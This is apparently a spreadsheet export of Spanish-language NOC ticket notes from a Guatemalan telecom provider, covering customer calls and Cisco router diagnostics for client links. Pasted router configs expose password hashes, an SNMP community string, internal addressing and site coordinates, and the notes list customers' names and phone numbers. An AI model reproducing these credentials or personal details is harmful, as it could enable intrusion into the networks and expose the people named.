    <t>SE TIENE A CLIENTE EN LINEA WILLIAM-72006668 ##COMENTA QUE PRESENTA INTERFERENCIA ## A NIVEL DE CLARO NO HAY PERDIDAS DE PAQUETES - ## SE LE PIDE APOYO A CIENTE PARA REINICIAR PBX Y DISPOSITIVO DE CLARO ##CLEINTE LO REINCIARA, PIDE SE LE MARQUE EN 15 MINUTOS##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NURIA ESCOBAR 75298191 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001089114</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NURIA ESCOBAR AL 75298191 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE LE LLAME A LAS 12:30 NUEVAMENTE PARA CONFIRMAR **
-ID 2001015532
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  WILLIAM-72006668 INDICA QUE NO SE ENCUENTRA EN SITIO QUE SE LE LLAME A LA SEÑORITA  NURIA ESCOBAR AL 75298191
-ID 2001014838
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WILLIAM-72006668 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001010440</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM-72006668 NO RESPONDE, ENVIA A BUZON
-ID 2001000568 - 2001000897</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE WILLIAM-72006668   ## INDICA QUE LUEGO DEL REINICIO DE SU PBX, LA CALIDAD DE LAS LLAMADAS YA MEJORO, COMENTA QUE SEGUIRA REALIZANDO PRUEBAS Y SE VALIDARA A LAS 7PM.
NOTA: CLIENTE TERMINA DE LABORAR HOY A LAS 10 PM ##VIVO</t>
  </si>
  <si>
    <t>F4614472</t>
  </si>
  <si>
    <t>CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 23 DE JUNIO DE 2022 17:35PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM187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4472
ID: 47501612T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM1877
UBICADO EN:  KM. 85 RUTA AL ALTLANTICO, LAS CHAMPAS, EL RANCHO SAN AGUSTIN ACASAGUASTLAN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4614478</t>
  </si>
  <si>
    <t>SE HABLÓ CON LAURY DAVISSON/CLIENTE 56964384 PIDE SE PRIORICE EL CASO, Y QUE SE COORDINE LA VISITA TÉCNICA PARA HOY, ELLA HACE TIEMPO HASTA LAS 20:00 HORAS.
SE LLAMÓ A GESTIÓN N1 PARA INFORMAR LO DICHO POR CLIENTE, NO CONTESTAN, SE LES PIDE APOYO VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4614479</t>
  </si>
  <si>
    <t>INFORMA CLIENTE BYRON RAYMUNDO 59660380 QUE RECIENTEMENTE CAMBIARON DE PLANTA PBX Y EL INCONVENIENTE QUE TIENEN AHORA ES QUE NO PUEDEN GENERAR LLAMADAS DESDE SUS DID, SÓLO PUEDEN GENERAR LLAMADAS DESDE EL GDN, CLIENTE INDICA QUE YA NO SE ENCUENTRA EN EL SITIO, SI ES NECESARIO HACER PRUEBAS SE LE PUEDE LLAMAR MAÑANA A PARTIR DE LAS 7 AM. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON RAYMUNDO 59660380 PARA CONSULTAR AVANCES, SOLICITA SE LE LLAME EN 30 MINUTOS. YA QUE ESTA OCUPADO. ID: 2001082270</t>
  </si>
  <si>
    <t>INFORMA CLIENTE BYRON RAYMUNDO 59660380 QUE YA ENVIÓ LA INFORMACIÓN A SU EJECUTIVO, EN ESPERA QUE SE APLIQUE LA CONFIGURACIÓN EN AVI, SE LLAMARÁ A LAS 16:30 HORAS PARA VALIDAR. ID DE LLAMADA: 2001097687</t>
  </si>
  <si>
    <t>INFORMA EJECUTIVO CESAR MORALES 58261244 SE LE EXPLICA EL CASO E INDICA QUE CLIENTE DEBE TENER EL GDN Y EL RANGO CONFIGURADO EN AVI, POR LO QUE SOLICITA QUE CLIENTE LE ENVÍE UN CORREO A WALTERM.ALFARO@CLARO.COM.GT SOLICITANDO QUE SE AGREGUE EL RANGO DEL E1 24221300 EN LA PLATAFORMA DE AVI PARA QUE SE PUEDA SOLICITAR LA CONFIGURACIÓN. ID: ID DE LLAMADA: 2001043343.
SE LLAMA AL CLIENTE BYRON RAYMUNDO 59660380 SE LE INDICA LA INFORMACIÓN, COMENTA QUE ENVIARÁ EL CORREO EN BREVE ID: 2001047856</t>
  </si>
  <si>
    <t>F4614508</t>
  </si>
  <si>
    <t>SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 26 MINUTO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FENACOAC_GT_ANTIGUO_TUTUAPA UPTIME IS 26 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.154-3.M3.BIN"
LAST RELOAD TYPE: NORMAL RELOAD
LAST RELOAD REASON: POWER-ON
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 26 MINUTO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FENACOAC_GT_ANTIGUO_TUTUAPA UPTIME IS 26 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.154-3.M3.BIN"
LAST RELOAD TYPE: NORMAL RELOAD
LAST RELOAD REASON: POWER-ON</t>
  </si>
  <si>
    <t xml:space="preserve">SE LLAMA AL CLIENTE ERIK EL CUAL INDICA QUE ACTUALMENTE SE ENCUENTRA OPERANDO POR EL ENLACE REDUNDANTE PARA REALIZAR PRUEBAS CON EL SERVICIO ES NECESARIO REALIZARLAS DE 8:00 AM A 5:00 PM SE DEJA PENDIENTE PARA REALIZAR PRUEBAS EN EQUIPOS MAÑANA YA QUE YA NO HAY PERSONAL PARA APOYAR CON PRUEBAS.
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 26 MINUTO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FENACOAC_GT_ANTIGUO_TUTUAPA UPTIME IS 26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129L2R1
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  CISCO1921/K9          FJC2129L2R1
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_FENACOAC_GT_ANTIGUO_TUTUAPA#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3232 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_FENACOAC_GT_ANTIGUO_TUTUAPA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$SOSF$MDRQENPJ/CTQPZ4BHIENV/
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC2129L2R1
!
!
USERNAME GESTIONIP SECRET 5 $1$ZIPX$LE5OU289NC4NRNEWBYKLU/
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.111.169 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/237400259T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.72.80.41 255.255.255.240
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN REDUNDANTE/_/237400333T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.72.80.221 255.255.255.248
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0/2
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0/3
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.60.156.1 255.255.255.0
 LOAD-INTERVAL 30
!
ROUTER OSPF 1
 ROUTER-ID 10.72.80.41
 AREA 216 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.80.32 0.0.0.15 AREA 216
 NEIGHBOR 10.72.80.33
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.80.217 220 NAME DEFAULT_REDUNDANTE
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.212.111.169/32
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.60.156.0/24
LOGGING SOURCE-INTERFACE LOOPBACK5
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION LAT.15 17 27.99N LONG.91 48 14.55O AGENCIA ANTIGUO TUTUAPA SAN MARCOS
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15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FENACOAC_GT_ANTIGUO_TUTUAPA#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 35 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 35 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 38 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.399: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JUN 23 23:17:12.127: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN 23 23:17:23.099: %CTS-6-ENV_DATA_START_STATE: ENVIRONMENT DATA DOWNLOAD IN START STATE
*JUN 23 23:17:29.135: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 23 23:17:29.135: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 23 23:17:30.047: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN 23 23:17:30.135: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 23 23:17:30.135: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 23 23:17:34.255: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*JUN 23 23:17:36.863 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN 23 23:17:37.599 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN 23 23:17:38.615 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 23 23:17:38.615 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 23 23:17:38.763 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 23 23:17:38.819 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 23 23:17:38.819 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 23 23:17:38.819 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 23 23:17:39.707 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN 23 23:17:39.707 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 23 23:17:39.811 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 23 23:17:39.863 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 23 23:17:39.863 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO DOWN
*JUN 23 23:17:39.863 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO DOWN
*JUN 23 23:17:40.031 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 23 23:17:40.787 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 05-JUN-15 12:31 BY PROD_REL_TEAM
*JUN 23 23:17:40.787 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_FENACOAC_GT_ANTIGUO_TUTUAPA IS UNDERGOING A COLD START
*JUN 23 23:17:41.443 UTC: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.212.111.169 IN NSSA 216 - P-BIT CLEARED
*JUN 23 23:17:43.403 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 23 23:17:44.135 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 23 23:17:44.403 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 23 23:17:45.143 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 23 23:17:48.135 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 23 23:17:49.135 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 23 23:18:09.743 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.80.33 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*JUN 23 23:18:12.427 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
CC_FENACOAC_GT_ANTIGUO_TUTUAPA#
SHOW CLOCK
*23:43:07.379 UTC THU JUN 23 2022
CC_FENACOAC_GT_ANTIGUO_TUTUAPA#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.60.156.1             -   A023.9F39.6880  ARPA   VLAN1
INTERNET  10.60.156.10            0   B07B.2503.2B21  ARPA   VLAN1
INTERNET  10.60.156.11            5   B07B.2503.994A  ARPA   VLAN1
INTERNET  10.60.156.110           0   3C52.8276.38BD  ARPA   VLAN1
INTERNET  10.60.156.150           0   B07B.2503.375D  ARPA   VLAN1
INTERNET  10.60.156.170          24   A4BB.6DD4.333B  ARPA   VLAN1
INTERNET  10.60.156.201           0   8C8C.AA8C.1630  ARPA   VLAN1
INTERNET  10.72.80.33             1   DC99.147A.A501  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.80.41             -   A023.9F39.6880  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.80.217            2   DC99.147A.A501  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.80.221            -   A023.9F39.6881  ARPA   GIGABITETHERNET0/1
CC_FENACOAC_GT_ANTIGUO_TUTUAPA#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/237400259T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/237400333T/_/
GI0/0/0                        UP             UP       LAN DEL CLIENTE
GI0/0/1                        ADMIN DOWN     DOWN
GI0/0/2                        ADMIN DOWN     DOWN
GI0/0/3                        ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_FENACOAC_GT_ANTIGUO_TUTUAPA#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.72.80.41     YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.72.80.221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11.169  YES NVRAM  UP                    UP
VLAN1                      10.60.156.1     YES NVRAM  UP                    UP
CC_FENACOAC_GT_ANTIGUO_TUTUAPA#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN FENACOAC 10.72.80.41
  PING 10.72.80.41: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.80.41 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 27/48/66 MS
RUTA IP:
PE: 10.179.28.35
DISPLAY IP ROUTING-TABLE VPN-INSTANCE FENACOAC 10.72.80.41
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : FENACOAC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.72.80.41/32  DIRECT  0    0                 0.0.0.0         VLANIF531			</t>
  </si>
  <si>
    <t>SE PROCEDE A DEJAR EN ETAPA PENDIENTE YA QUE EN TTK ANTERIOR POR LA DOCUMENTACION SE TIENE PROBLEMA A NIVEL DE APLICACION SE LLAMARA LUEGO AL CLIENTE PARA VALIDAR EL SINTOMA QUE PERSIVE EN SU RED.</t>
  </si>
  <si>
    <t>SE LLAMA AL SEÑORR ERICK LOPES PARA CONSULTAR SOBRE CUAL ES EL INCONVENIENTE QUE PERSIVE PERO NO SE TIENE RESPUESTA.</t>
  </si>
  <si>
    <t>F4614545</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE KARLA GONZALES QUIEN INDICA QUE EL SERVICIO SE ENCONTRO AFECTADO POR 20MIN Y LUEGO REESTABLECIO.
INDICA QUE POR EL MOMENTO SE ENCUENTRA ACTIVO. SOLICITA QUE SE DEJE EN OBSERVACION YA QUE EL DOMINGO TAMBIEN LE PRESENTO CAIDA.
SI VUELVE A CAER VA HACER NECESARIO CERTIFICAR EL COBRE.
1001972168
COLA:
NOMBRE: A: 79578300
NÚMERO: 79578300
DURACIÓN: 0:01:38
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 79578300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/06/2022 18:13:11</t>
  </si>
  <si>
    <t>F4614551</t>
  </si>
  <si>
    <t>REVISANDO</t>
  </si>
  <si>
    <t>F4614574</t>
  </si>
  <si>
    <t>CLIENTE EDGAR QUINTEROS 57084834 VALIDAEL SERVICIO ESTABLE Y OPERATIVO LUEGO DEL CAMBIO SOLICITADO, AUTORIZA EL CIERRE DEL CASO. ID: 2001041355</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE EDGAR QUINTEROS 57084834, CLIENTE SOLICITÓ CAMBIAR LA NEGOCIACIÓN DEL PUERTO 4 DEL CTC HACIA LA PBX A AUTONEGOCIACIÓN YA QUE INDICABA QUE TENÍA PERDIDA DE AUDIO, SE REALIZÓ EL CAMBIO SOLICITADO Y CLIENTE INDICA QUE YA NO PERCIBE PÉRDIDAS, SOLICITA SE VALIDE A LAS 10 AM EN LO QUE REALIZA MÁS PRUEBAS. ID: 1001998291</t>
  </si>
  <si>
    <t>F4614654</t>
  </si>
  <si>
    <t>SE HABLA CON PERSONAL DE 5B, MOISES PANJOJ,  SE DESCARTAN PROBLEMAS DE ENERGIA O TRABAJOS DE MANTENIMIENTO , SE ACUERDA VISITA EN CONJUNTO PARA REVISION DE EQUIPOS Y MEDIO DE FIBRA. SERVICI OINTERMITENTE.
ID
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 16:24
FIN: HOY, 16:27
DURACIÓN: 3:31
ID DE LLAMADA: 2001305339</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE TAVSA INDICANDO QUE SI SE CUENTA CON UPS EN BUEN ESTADO
MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;
BUENAS TARDES
ESTIMADOS:
SUPERVISOR ANTONY DE LEÓN INDICA QUE SI CUENTA CON UPS INTERNO EN BUEN ESTADO EL MOTIVO DE LA INESTABILIDAD ES QUE EL CAJERO SOLO CUENTA CON 3G ROUTER YA QUE EL ENLACE PRINCIPAL SERÁ TRABAJADO POR TÉCNICOS DE CLARO INFORMA SUPERVISOR.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>SE SOLICITAN AVENCES CON LA REVISION DE UPS EN ATM
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE DEL ATM: ATM67, SOLICITAMOS SU APOYO CON LA REVISIÓN DE UPS SEGÚN LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE TAVSA INDICANDO QUE SE REVISARA EL DIA DE MAÑAA
OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;
BUEN DÍA:
CON GUSTO SE ESTARÁ ENVIANDO A UN SUPERVISOR A VALIDAR EL DÍA DE MAÑANA.
SALUDOS,</t>
  </si>
  <si>
    <t>F4614714</t>
  </si>
  <si>
    <t>SE RESPONDE AL CLIENTE EN LA MISMA COLA DE CORREO</t>
  </si>
  <si>
    <t xml:space="preserve">EL ENALCE SE ENCUENTRA OPERATIVO SIN PERDIDAS NI LATENCIAS SE ENCONTRO UN EVENTO  DE  UNA ADYACENCIA EN EL PUERTO DE LA CONEXION LAN DEL CLEINTE ES NECESARIO VALIDAR CON EL CLEINTE POR QUE LO QUE SE PERSIVE ES UNA DESCONCEXION EN LA INTERFACE QUE CONECTA CON LA RED INTERNA DEL CLIENTE.
*JUN  8 19:39:17.392 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*JUN 17 17:18:59.707 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*JUN 17 19:33:32.666 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*JUN 23 23:16:30.205 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.56.39.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
CC_WALMART_GT_TIENDA_0761#
SHOW CLOCK
*03:13:39.940 UTC FRI JUN 24 2022
CC_WALMART_GT_TIENDA_0761#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.97.1              0   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.97.11             -   00A3.8E70.6B20  ARPA   GIGABITETHERNET0/0
INTERNET  22.48.3.77            119   00A3.8EC8.8140  ARPA   GIGABITETHERNET0/1
INTERNET  22.48.3.78              -   00A3.8E70.6B21  ARPA   GIGABITETHERNET0/1
CC_WALMART_GT_TIENDA_0761#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/344400576T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_WALMART_GT_TIENDA_0761#
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 17 SEMAN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WALMART_GT_TIENDA_0761 UPTIME IS 17 WEEKS, 5 DAYS, 3 HOURS, 3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129L2L0
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  CISCO1921/K9          FJC2129L2L0
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_WALMART_GT_TIENDA_0761#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3191 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
